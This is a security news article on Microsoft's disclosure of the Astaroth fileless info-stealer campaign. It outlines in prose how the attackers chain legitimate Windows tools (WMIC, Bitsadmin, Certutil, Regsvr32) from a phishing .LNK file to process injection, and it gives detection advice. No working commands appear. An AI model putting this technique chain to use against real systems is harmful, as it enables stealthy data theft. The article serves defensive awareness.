Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a commonly used technique in fileless malware attacks and so it proved this time, with attackers spreading the info-stealing malware via a spear-phishing link to a .LNK file.
“When double-clicked, the LNK file causes the execution of the WMIC tool with the ‘/Format’ parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool,” Lelli explained.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make it difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats as they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.